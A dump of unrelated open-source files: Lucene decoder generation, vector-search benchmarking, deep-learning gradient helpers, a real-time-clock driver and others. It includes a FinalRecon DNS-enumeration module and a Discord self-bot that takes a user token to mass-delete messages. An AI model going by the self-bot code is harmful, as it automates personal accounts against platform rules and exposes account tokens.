void decode(int bitsPerValue, DataInput in, long[] longs) throws IOException {
switch (bitsPerValue) {
""")
for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' case %d:\n' %bpv)
f.write(' decode%d(in, tmp, longs);\n' %bpv)
f.write(' expand%d(longs);\n' %next_primitive)
f.write(' break;\n')
f.write(' default:\n')
f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n')
f.write(' expand32(longs);\n')
f.write(' break;\n')
f.write(' }\n')
f.write(' }\n')
f.write("""
/** Delta-decode 128 integers into {@code longs}. */
void decodeAndPrefixSum(int bitsPerValue, DataInput in, long base, long[] longs)
throws IOException {
switch (bitsPerValue) {
""")
for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' case %d:\n' %bpv)
f.write(' decode%d(in, tmp, longs);\n' %bpv)
f.write(' prefixSum%d(longs, base);\n' %next_primitive)
f.write(' break;\n')
f.write(' default:\n')
f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n')
f.write(' prefixSum32(longs, base);\n')
f.write(' break;\n')
f.write(' }\n')
f.write(' }\n')
f.write('\n')
for i in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
writeDecode(i, f)
f.write('}\n')
|
examples/benchmark/run_sift1b.py | abcp4/rii | 120 | 12748464 | <reponame>abcp4/rii
import numpy as np
import pathlib
import nanopq
import pickle
import time
import more_itertools
import texmex_python
import util
### If you'd like to debug, please uninstall rii and uncomment the following lines
#import sys
#sys.path.append('../../')
import rii
def run(engine, L, Xq, gt, r):
"""
Given a searcher, run the search. Return the runtime and the accuracy
Args:
engine (rii.Rii): Rii search engine
L (int): The number of candidates for search
Xq (np.array): Query vectors. shape=(Nq, D). dtype=np.float32
gt (np.array): Groundtruth. shape=(Nq, ANY). dtype=np.int32
r (int): Top R
Returns:
(float, float): Duration [sec/query] and recall@r over the queries
"""
assert Xq.ndim == 2
assert Xq.dtype == np.float32
Nq = Xq.shape[0]
I = np.zeros((Nq, r), dtype=int)
t0 = time.time()
for i, q in enumerate(Xq):
I[i], _ = engine.query(q=q, topk=r, L=L)
t1 = time.time()
duration = (t1 - t0) / Nq # sec/query
recall = util.recall_at_r(I, gt, r)
return duration, recall
# Setup paths
p = pathlib.Path('.')
path_train = p / "data/bigann_learn.bvecs"
path_base = p / "data/bigann_base.bvecs"
path_query = p / "data/bigann_query.bvecs"
path_gt = p / "data/gnd/idx_1000M.ivecs"
# Read queries and groundtruth
Xq = texmex_python.reader.read_bvec(path_query.open("rb")).astype(np.float32)
gt = util.ivecs_read(str(path_gt))
# Reat top Nt vectors for training
print("Start to read training vectors")
Xt = []
Nt = 10000000 # Use top 10M vectors for training
with path_train.open("rb") as f:
for vec in texmex_python.reader.read_bvec_iter(f):
Xt.append(vec)
if len(Xt) == Nt:
break
Xt = np.array(Xt, dtype=np.float32)
print("Xt.shape: {}, Xt.dtype: {}".format(Xt.shape, Xt.dtype))
# Train a PQ codec and save it
M = 8 # The number of subspace.
path_codec = p / 'cache/codec_m{}.pkl'.format(M)
if not path_codec.exists():
print("Start to train a codec")
codec = nanopq.PQ(M=M, verbose=True).fit(vecs=Xt)
pickle.dump(codec, path_codec.open("wb"))
print("Dump the codec in {}".format(path_codec))
else:
print("Read a codec from cache: {}".format(path_codec))
codec = pickle.load(path_codec.open("rb"))
# Construct a search engine
path_engine = p / 'cache/engine_m{}.pkl'.format(M)
if not path_engine.exists():
print("Start to construct a Rii engine")
e = rii.Rii(fine_quantizer=codec)
batch_size = 10000000
with path_base.open("rb") as f:
for n, batch in enumerate(more_itertools.chunked(texmex_python.reader.read_bvec_iter(f), batch_size)):
print("batch: {} / {}".format(n, int(1000000000 / batch_size)))
e.add(vecs=np.array(batch, dtype=np.float32))
e.reconfigure()
pickle.dump(e, path_engine.open("wb"))
print("Dump the engine in {}".format(path_engine))
else:
print("Read an engine from cache: {}".format(path_engine))
e = pickle.load(path_engine.open("rb"))
e.print_params()
# Run search
r = 1 # Reacll@r
w = 1 # The parameter for search candidates. L = L0 * w = N / nlist * w. The default (fastest) setting is w=1
duration, recall = run(engine=e, L=e.L0 * w, Xq=Xq, gt=gt, r=r)
print("{} msec/query. Recall@{} = {}".format(duration * 1000, r, recall))
|
Trescope4Python/library/src/trescope/config/VectorField3DConfig.py | aaabbb2021/Trescope | 105 | 12748468 | from typing import List
from trescope.config import Config, AnchorType, AnchorCM
from trescope.core.Utils import toListIfNumpyOrTensorArray
class VectorField3DConfig(Config):
"""Config for :py:meth:`trescope.Output.plotVectorField3D`"""
def __init__(self):
super().__init__()
self.__sizeFactor: float = .5
self.__autoScaleByLocation = False
self.__colorScale = [[0, 0x88000000], [1, 0x88000000]]
self.__x: List[float] = []
self.__y: List[float] = []
self.__z: List[float] = []
self.__anchor: str = str(AnchorCM)
def sizeFactor(self, sizeFactor: float):
"""
Specify size factor .
:param sizeFactor: size factor , default .5
:return: self , for chain call
"""
self.__sizeFactor = sizeFactor
return self
def anchor(self, anchor: AnchorType):
"""
Specify anchor type .
:param anchor: anchor
:return: self , for chain call
"""
self.__anchor = str(anchor)
return self
def autoScaleByLocation(self, autoScale: bool):
"""
Specify auto scale or not .
:param autoScale: auto scale , default `False`
:return: self , for chain call
"""
self.__autoScaleByLocation = autoScale
return self
def locations(self, x: List[float], y: List[float], z: List[float]):
"""
Specify locations .
:param x: x
:param y: y
:param z: z
:return: self , for chain call
"""
self.__x, self.__y, self.__z = x, y, z
return self
def color(self, color: int):
"""
Specify color .
:param color: color
:return: self , for chain call
"""
self.__colorScale = [[0, color], [1, color]]
return self
def toDict(self):
return {
**super().toDict(),
'sizeFactor': self.__sizeFactor,
'autoScaleByLocation': self.__autoScaleByLocation,
'colorScale': self.__colorScale,
'locationX': toListIfNumpyOrTensorArray(self.__x),
'locationY': toListIfNumpyOrTensorArray(self.__y),
'locationZ': toListIfNumpyOrTensorArray(self.__z),
'anchor': self.__anchor
}
|
modules/dns.py | tomsec/FinalRecon | 1,391 | 12748482 | <reponame>tomsec/FinalRecon
#!/usr/bin/env python3
import os
import dnslib
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
Y = '\033[33m' # yellow
def dnsrec(domain, output, data):
result = {}
print('\n' + Y + '[!]' + Y + ' Starting DNS Enumeration...' + W + '\n')
types = ['A', 'AAAA', 'ANY', 'CAA', 'CNAME', 'MX', 'NS', 'TXT']
full_ans = []
for Type in types:
q = dnslib.DNSRecord.question(domain, Type)
pkt = q.send('8.8.8.8', 53, tcp='UDP')
ans = dnslib.DNSRecord.parse(pkt)
ans = str(ans)
ans = ans.split('\n')
full_ans.extend(ans)
full_ans = set(full_ans)
dns_found = []
for entry in full_ans:
if entry.startswith(';') == False:
dns_found.append(entry)
else:
pass
if len(dns_found) != 0:
for entry in dns_found:
print(G + '[+]' + C + ' {}'.format(entry) + W)
if output != 'None':
result.setdefault('dns', []).append(entry)
else:
print(R + '[-]' + C + ' DNS Records Not Found!' + W)
if output != 'None':
result.setdefault('dns', ['DNS Records Not Found'])
dmarc_target = '_dmarc.' + domain
q = dnslib.DNSRecord.question(dmarc_target, 'TXT')
pkt = q.send('8.8.8.8', 53, tcp='UDP')
dmarc_ans = dnslib.DNSRecord.parse(pkt)
dmarc_ans = str(dmarc_ans)
dmarc_ans = dmarc_ans.split('\n')
dmarc_found = []
for entry in dmarc_ans:
if entry.startswith('_dmarc') == True:
dmarc_found.append(entry)
else:
pass
if len(dmarc_found) != 0:
for entry in dmarc_found:
print(G + '[+]' + C + ' {}'.format(entry) + W)
if output != 'None':
result.setdefault('dmarc', []).append(entry)
else:
print('\n' + R + '[-]' + C + ' DMARC Record Not Found!' + W)
if output != 'None':
result.setdefault('dmarc', ['DMARC Record Not Found!'])
if output != 'None':
dns_export(output, data, result)
def dns_export(output, data, result):
data['module-DNS Enumeration'] = result |
Additional_File/16_ClearDM/cleardm.py | nomrsavage/Discord-All-Tools-In-One | 197 | 12748493 | import os, os.path, discord
from discord.ext import commands
from colorama import Fore
os.system('cls' if os.name == 'nt' else 'clear')
cleardmtitle()
print(f"""{y}[{w}+{y}]{w} Enter your token""")
token = input(f"""{y}[{b}#{y}]{w} Token: """)
print(f"""\n{y}[{b}#{y}]{w} Write "!clear" in one of your DMs to delete your messages""")
global bot
bot = commands.Bot(command_prefix="!", self_bot=True)
bot.remove_command("help")
@bot.command()
async def clear(ctx, limit: int=None):
passed = 0
failed = 0
async for msg in ctx.message.channel.history(limit=limit):
if msg.author.id == bot.user.id:
try:
await msg.delete()
passed += 1
except:
failed += 1
print(f"\n{y}[{w}+{y}]{w} Removed {passed} messages with {failed} fails")
input(f"""\n{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
bot.run(token, bot=False) |
python/paddle/fluid/dygraph/parallel_helper.py | OuyangChao/Paddle | 17,085 | 12748530 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except jin compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ..layers import collective
from ..framework import Parameter
__parallel_ctx__clz__ = None
def _is_data_parallel_mode():
global __parallel_ctx__clz__
return __parallel_ctx__clz__ is not None and int(
os.getenv("PADDLE_TRAINERS_NUM", "1")) > 1
def _is_parallel_ctx_initialized():
global __parallel_ctx__clz__
return __parallel_ctx__clz__ is not None
def _set_parallel_ctx(nccl_parallel_context):
global __parallel_ctx__clz__
assert __parallel_ctx__clz__ is None, \
"ParallelContext can only be initialized once."
__parallel_ctx__clz__ = nccl_parallel_context
def _init_parallel_ctx():
global __parallel_ctx__clz__
assert __parallel_ctx__clz__ is not None, \
"ParallelContext should be initialized."
__parallel_ctx__clz__.init()
def _broadcast_parameters(parameters):
for param in parameters:
# In model parallel, some parameters are split into multiple devices,
# so we could not broadcast these parameters.
if param.is_distributed: continue
if isinstance(param, Parameter) and param.trainable:
collective._broadcast(param, 0, sync_mode=True)
|
misc/DS1307/DS1307.py | garymeg/mpy-lib | 116 | 12748541 | '''
DS1307 RTC drive
Author: shaoziyang
Date: 2018.3
http://www.micropython.org.cn
'''
from micropython import const
DS1307_I2C_ADDRESS = const(104)
DS1307_REG_SECOND = const(0)
DS1307_REG_MINUTE = const(1)
DS1307_REG_HOUR = const(2)
DS1307_REG_WEEKDAY = const(3)
DS1307_REG_DAY = const(4)
DS1307_REG_MONTH = const(5)
DS1307_REG_YEAR = const(6)
DS1307_REG_CTRL = const(7)
DS1307_REG_RAM = const(8)
class DS1307():
def __init__(self, i2c):
self.i2c = i2c
self.DT = [0] * 8
self.buf = bytearray(8)
self.tb = bytearray(1)
self.rb = bytearray(1)
self.start()
# set reg
def setReg(self, reg, dat):
self.tb[0] = dat
self.i2c.writeto_mem(DS1307_I2C_ADDRESS, reg, self.tb)
# get reg
def getReg(self, reg):
self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, reg, self.rb)
return self.rb[0]
def start(self):
t = self.getReg(DS1307_REG_SECOND)
self.setReg(DS1307_REG_SECOND, t&0x7F)
def stop(self):
t = self.getReg(DS1307_REG_SECOND)
self.setReg(DS1307_REG_SECOND, t|0x80)
def DecToHex(self, dat):
return (dat//10) * 16 + (dat%10)
def HexToDec(self, dat):
return (dat//16) * 10 + (dat%16)
def datetime(self, DT=None):
if DT == None:
self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, DS1307_REG_SECOND, self.buf)
self.DT[0] = self.HexToDec(self.buf[6]) + 2000
self.DT[1] = self.HexToDec(self.buf[5])
self.DT[2] = self.HexToDec(self.buf[4])
self.DT[3] = self.HexToDec(self.buf[3])
self.DT[4] = self.HexToDec(self.buf[2])
self.DT[5] = self.HexToDec(self.buf[1])
self.DT[6] = self.HexToDec(self.buf[0])
self.DT[7] = 0
return self.DT
else:
self.buf[0] = 0
self.buf[1] = self.DecToHex(DT[6]%60) # second
self.buf[2] = self.DecToHex(DT[5]%60) # minute
self.buf[3] = self.DecToHex(DT[4]%24) # hour
self.buf[4] = self.DecToHex(DT[3]%8) # week day
self.buf[5] = self.DecToHex(DT[2]%32) # date
self.buf[6] = self.DecToHex(DT[1]%13) # month
self.buf[7] = self.DecToHex(DT[0]%100) # year
self.i2c.writeto(DS1307_I2C_ADDRESS, self.buf)
def year(self, year = None):
if year == None:
return self.HexToDec(self.getReg(DS1307_REG_YEAR)) + 2000
else:
self.setReg(DS1307_REG_YEAR, self.DecToHex(year%100))
def month(self, month = None):
if month == None:
return self.HexToDec(self.getReg(DS1307_REG_MONTH))
else:
self.setReg(DS1307_REG_MONTH, self.DecToHex(month%13))
def day(self, day = None):
if day == None:
return self.HexToDec(self.getReg(DS1307_REG_DAY))
else:
self.setReg(DS1307_REG_DAY, self.DecToHex(day%32))
def weekday(self, weekday = None):
if weekday == None:
return self.HexToDec(self.getReg(DS1307_REG_WEEKDAY))
else:
self.setReg(DS1307_REG_WEEKDAY, self.DecToHex(weekday%8))
def hour(self, hour = None):
if hour == None:
return self.HexToDec(self.getReg(DS1307_REG_HOUR))
else:
self.setReg(DS1307_REG_HOUR, self.DecToHex(hour%24))
def minute(self, minute = None):
if minute == None:
return self.HexToDec(self.getReg(DS1307_REG_MINUTE))
else:
self.setReg(DS1307_REG_MINUTE, self.DecToHex(minute%60))
def second(self, second = None):
if second == None:
return self.HexToDec(self.getReg(DS1307_REG_SECOND))
else:
self.setReg(DS1307_REG_SECOND, self.DecToHex(second%60))
def ram(self, reg, dat = None):
if dat == None:
return self.getReg(DS1307_REG_RAM + (reg%56))
else:
self.setReg(DS1307_REG_RAM + (reg%56), dat)
|
modelci/experimental/finetuner/__init__.py | FerdinandZhong/ML-Model-CI | 170 | 12748555 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: <NAME>
Email: <EMAIL>
Date: 1/12/2021
"""
from pathlib import Path
OUTPUT_DIR = Path.home() / 'tmp'
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
|
openshift/installer/vendored/openshift-ansible-3.11.28-1/roles/lib_utils/test/test_sanity_checks.py | fahlmant/openshift-tools | 164 | 12748567 | <reponame>fahlmant/openshift-tools<gh_stars>100-1000
'''
Unit tests for wildcard
'''
import os
import sys
MODULE_PATH = os.path.realpath(os.path.join(__file__, os.pardir, os.pardir, 'action_plugins'))
sys.path.insert(0, MODULE_PATH)
# pylint: disable=import-error,wrong-import-position,missing-docstring
from sanity_checks import is_registry_match # noqa: E402
def test_is_registry_match():
'''
Test for is_registry_match
'''
pat_allowall = "*"
pat_docker = "docker.io"
pat_subdomain = "*.example.com"
pat_matchport = "registry:80"
assert is_registry_match("docker.io/repo/my", pat_allowall)
assert is_registry_match("example.com:4000/repo/my", pat_allowall)
assert is_registry_match("192.168.127.12:4000/a/b/c", pat_allowall)
assert is_registry_match("https://registry.com", pat_allowall)
assert is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_allowall)
assert is_registry_match("docker.io/repo/my", pat_docker)
assert is_registry_match("docker.io:443/repo/my", pat_docker)
assert is_registry_match("docker.io/openshift3/ose-${component}:${version}", pat_allowall)
assert not is_registry_match("example.com:4000/repo/my", pat_docker)
assert not is_registry_match("index.docker.io/a/b/c", pat_docker)
assert not is_registry_match("https://registry.com", pat_docker)
assert not is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_docker)
assert is_registry_match("apps.foo.example.com/prefix", pat_subdomain)
assert is_registry_match("sub.example.com:80", pat_subdomain)
assert not is_registry_match("https://example.com:443/prefix", pat_subdomain)
assert not is_registry_match("docker.io/library/my", pat_subdomain)
assert not is_registry_match("https://hello.example.bar", pat_subdomain)
assert is_registry_match("registry:80/prefix", pat_matchport)
assert is_registry_match("registry/myapp", pat_matchport)
assert is_registry_match("registry:443/myap", pat_matchport)
assert not is_registry_match("https://example.com:443/prefix", pat_matchport)
assert not is_registry_match("docker.io/library/my", pat_matchport)
assert not is_registry_match("https://hello.registry/myapp", pat_matchport)
if __name__ == '__main__':
test_is_registry_match()
|
dalib/vision/__init__.py | xyzhu12/Transfer-Learning-Library | 109 | 12748569 | __all__ = ['datasets', 'models']
|
distributed training/tf-sentiment-script-mode/sentiment.py | merb92/amazon-sagemaker-keras-text-classification | 106 | 12748573 | <reponame>merb92/amazon-sagemaker-keras-text-classification
import argparse
import numpy as np
import os
import tensorflow as tf
from tensorflow.contrib.eager.python import tfe
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
tf.logging.set_verbosity(tf.logging.ERROR)
max_features = 20000
maxlen = 400
embedding_dims = 300
filters = 250
kernel_size = 3
hidden_dims = 250
def parse_args():
parser = argparse.ArgumentParser()
# hyperparameters sent by the client are passed as command-line arguments to the script
parser.add_argument('--epochs', type=int, default=1)
parser.add_argument('--batch_size', type=int, default=64)
# data directories
parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))
parser.add_argument('--test', type=str, default=os.environ.get('SM_CHANNEL_TEST'))
# model directory: we will use the default set by SageMaker, /opt/ml/model
parser.add_argument('--model_dir', type=str, default=os.environ.get('SM_MODEL_DIR'))
return parser.parse_known_args()
def get_train_data(train_dir):
x_train = np.load(os.path.join(train_dir, 'x_train.npy'))
y_train = np.load(os.path.join(train_dir, 'y_train.npy'))
print('x train', x_train.shape,'y train', y_train.shape)
return x_train, y_train
def get_test_data(test_dir):
x_test = np.load(os.path.join(test_dir, 'x_test.npy'))
y_test = np.load(os.path.join(test_dir, 'y_test.npy'))
print('x test', x_test.shape,'y test', y_test.shape)
return x_test, y_test
def get_model():
embedding_layer = tf.keras.layers.Embedding(max_features,
embedding_dims,
input_length=maxlen)
sequence_input = tf.keras.Input(shape=(maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = tf.keras.layers.Dropout(0.2)(embedded_sequences)
x = tf.keras.layers.Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1)(x)
x = tf.keras.layers.MaxPooling1D()(x)
x = tf.keras.layers.GlobalMaxPooling1D()(x)
x = tf.keras.layers.Dense(hidden_dims, activation='relu')(x)
x = tf.keras.layers.Dropout(0.2)(x)
preds = tf.keras.layers.Dense(1, activation='sigmoid')(x)
return tf.keras.Model(sequence_input, preds)
if __name__ == "__main__":
args, _ = parse_args()
x_train, y_train = get_train_data(args.train)
x_test, y_test = get_test_data(args.test)
model = get_model()
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=args.batch_size,
epochs=args.epochs,
validation_data=(x_test, y_test))
# create a TensorFlow SavedModel for deployment to a SageMaker endpoint with TensorFlow Serving
tf.contrib.saved_model.save_keras_model(model, args.model_dir)
|
torch/nn/grad.py | Hacky-DH/pytorch | 60,067 | 12748595 | <reponame>Hacky-DH/pytorch<filename>torch/nn/grad.py
"""Gradient interface"""
import torch
from .modules.utils import _single, _pair, _triple
import warnings
def _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation=None):
if dilation is None:
# For backward compatibility
warnings.warn("_grad_input_padding 'dilation' argument not provided. Default of 1 is used.")
dilation = [1] * len(stride)
input_size = list(input_size)
k = grad_output.dim() - 2
if len(input_size) == k + 2:
input_size = input_size[-k:]
if len(input_size) != k:
raise ValueError("input_size must have {} elements (got {})"
.format(k + 2, len(input_size)))
def dim_size(d):
return ((grad_output.size(d + 2) - 1) * stride[d] - 2 * padding[d] + 1
+ dilation[d] * (kernel_size[d] - 1))
min_sizes = [dim_size(d) for d in range(k)]
max_sizes = [min_sizes[d] + stride[d] - 1 for d in range(k)]
for size, min_size, max_size in zip(input_size, min_sizes, max_sizes):
if size < min_size or size > max_size:
raise ValueError(
("requested an input grad size of {}, but valid sizes range "
"from {} to {} (for a grad_output of {})").format(
input_size, min_sizes, max_sizes,
grad_output.size()[2:]))
return tuple(input_size[d] - min_sizes[d] for d in range(k))
def conv1d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv1d with respect to the input of the convolution.
This is same as the 1D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weight tensor (out_channels x in_channels/groups x kW)
grad_output : output gradient tensor (minibatch x out_channels x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3, requires_grad=True)
>>> weight = torch.randn(1,1,1, requires_grad=True)
>>> output = F.conv1d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv1d_input(input.shape, weight, grad_output)
"""
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
kernel_size = [weight.shape[2]]
if input_size is None:
raise ValueError("grad.conv1d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose1d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv1d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv1d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3, requires_grad=True)
>>> weight = torch.randn(1,1,1, requires_grad=True)
>>> output = F.conv1d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_weight = torch.autograd.grad(output, filter, grad_output)
>>> F.grad.conv1d_weight(input, weight.shape, grad_output)
"""
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2])
grad_weight = torch.conv1d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels, grad_weight.shape[2]).transpose(
0, 1).narrow(2, 0, weight_size[2])
def conv2d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv2d with respect to the input of the convolution.
This is same as the 2D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weight tensor (out_channels x in_channels/groups x kH x kW)
grad_output : output gradient tensor (minibatch x out_channels x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3,3, requires_grad=True)
>>> weight = torch.randn(1,1,1,2, requires_grad=True)
>>> output = F.conv2d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv2d_input(input.shape, weight, grad_output)
"""
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
kernel_size = (weight.shape[2], weight.shape[3])
if input_size is None:
raise ValueError("grad.conv2d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose2d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv2d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv2d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iH x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(1,1,3,3, requires_grad=True)
>>> weight = torch.randn(1,1,1,2, requires_grad=True)
>>> output = F.conv2d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_weight = torch.autograd.grad(output, filter, grad_output)
>>> F.grad.conv2d_weight(input, weight.shape, grad_output)
"""
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1,
1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2],
grad_output.shape[3])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2], input.shape[3])
grad_weight = torch.conv2d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2],
grad_weight.shape[3])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels,
grad_weight.shape[2], grad_weight.shape[3]).transpose(0, 1).narrow(
2, 0, weight_size[2]).narrow(3, 0, weight_size[3])
def conv3d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv3d with respect to the input of the convolution.
This is same as the 3D transposed convolution operator under the hood but requires
the shape of the gradient w.r.t. input to be specified explicitly.
Args:
input_size : Shape of the input gradient tensor
weight: weights tensor (out_channels x in_channels/groups x kT x kH x kW)
grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True)
>>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True)
>>> output = F.conv3d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_input = torch.autograd.grad(output, input, grad_output)
>>> F.grad.conv3d_input(input.shape, weight, grad_output)
"""
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
kernel_size = (weight.shape[2], weight.shape[3], weight.shape[4])
if input_size is None:
raise ValueError("grad.conv3d_input requires specifying an input_size")
grad_input_padding = _grad_input_padding(grad_output, input_size, stride,
padding, kernel_size, dilation)
return torch.conv_transpose3d(
grad_output, weight, None, stride, padding, grad_input_padding, groups,
dilation)
def conv3d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1):
r"""
Computes the gradient of conv3d with respect to the weight of the convolution.
Args:
input: input tensor of shape (minibatch x in_channels x iT x iH x iW)
weight_size : Shape of the weight gradient tensor
grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW)
stride (int or tuple, optional): Stride of the convolution. Default: 1
padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0
dilation (int or tuple, optional): Spacing between kernel elements. Default: 1
groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1
Examples::
>>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True)
>>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True)
>>> output = F.conv3d(input, weight)
>>> grad_output = torch.randn(output.shape)
>>> grad_weight = torch.autograd.grad(output, weight, grad_output)
>>> F.grad.conv3d_weight(input, weight.shape, grad_output)
"""
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
in_channels = input.shape[1]
out_channels = grad_output.shape[1]
min_batch = input.shape[0]
grad_output = grad_output.repeat(1, in_channels // groups, 1, 1, 1)
grad_output = grad_output.contiguous().view(
grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2],
grad_output.shape[3], grad_output.shape[4])
input = input.contiguous().view(1, input.shape[0] * input.shape[1],
input.shape[2], input.shape[3],
input.shape[4])
grad_weight = torch.conv3d(input, grad_output, None, dilation, padding,
stride, in_channels * min_batch)
grad_weight = grad_weight.contiguous().view(
min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2],
grad_weight.shape[3], grad_weight.shape[4])
return grad_weight.sum(dim=0).view(
in_channels // groups, out_channels, grad_weight.shape[2],
grad_weight.shape[3], grad_weight.shape[4]).transpose(0, 1).narrow(
2, 0, weight_size[2]).narrow(3, 0, weight_size[3]).narrow(
4, 0, weight_size[4])
|
pyalgotrade/optimizer/server.py | cdyfng/pyalgotrade | 1,000 | 12748617 | # PyAlgoTrade
#
# Copyright 2011-2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
